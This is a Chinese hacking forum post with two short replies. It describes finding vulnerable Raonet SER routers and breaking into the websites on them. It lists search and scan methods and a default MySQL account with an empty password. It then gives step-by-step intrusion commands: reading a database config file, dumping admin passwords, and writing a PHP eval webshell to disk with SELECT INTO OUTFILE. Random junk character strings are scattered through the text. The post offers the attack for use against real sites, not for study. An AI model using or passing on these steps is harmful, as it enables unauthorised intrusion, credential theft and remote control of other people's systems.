找回密码
 立即注册
查看: 3421|回复: 2
打印 上一主题 下一主题

利用某路由器漏洞入侵国外站点

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-10 10:30:18 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
  寻找存在漏洞的路由器方法:
8 Q4 ?, N1 k- G6 ^# ~6 N8 |& `
1:google搜索'Raonet Subscriber Ethernet Router') J' c, y% z6 F$ ^

( ^/ I; `) d5 i: ~1 h2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr20017 @% H7 P& n2 N  {* ?; j

8 q% l: o; l* ]. l3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
+ N0 `# e) x5 ?4 n7 c2 T* \3 x1 b( ?$ u4 ]  j
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
8 Q0 H- J) Z2 ^  Z: t" l# f9 ^
, p. }. z- B1 L, V* Z# @+ {9 H
6 y" ^9 ^1 K( J% |' O4 J  @" W9 M' i* G
入侵步骤:9 f6 |7 J9 N  k& I0 `
; ?. _# d$ q3 n* c6 b( v: t1 c1 ~
1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php
3 F- |; W. f& Q  r4 q' k7 m( Y4 v' r6 ]6 ^
2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc
! Z8 r8 `" r) [+ j0 O) K' |: f3:得到密码后连接,查看GUI管理密码:
) ~0 N$ B& I+ f9 P$ z6 luse ser_500
+ H, U# `' F4 o4 Oselect id,passwd from user;5 c& @2 ]9 p! s
4:通过数据库写入webshell,执行命令:
7 `+ v" K' G! F/ Puse mysql;- ^, {* o5 j7 j9 y
create table ok(cmd TEXT);
, I0 H/ K! |% x1 Kinsert into ok values("<?php @eval($_POST[cmd])?>");5 T$ _6 N9 R" `2 C5 m
select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
6 L8 N+ x0 w& u% Cdrop table ok;
! I$ O" l& }4 z' s0 N; X$ a; v: N* m
5:连接后门shell.php
9 e# [4 W# Y* S* W1 a9 o; ^
) O! |# }9 p" E0 I# V6. 搞定!
  o- q2 U' b! {$ y. u
5 T9 z% L9 U6 u: y
回复

使用道具 举报

沙发
发表于 2013-7-27 20:06:50 | 只看该作者
这个后果可以很严重的说
回复 支持 反对

使用道具 举报

板凳
发表于 2013-7-29 12:07:54 | 只看该作者
不错哦,黑服务器补洞。。
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表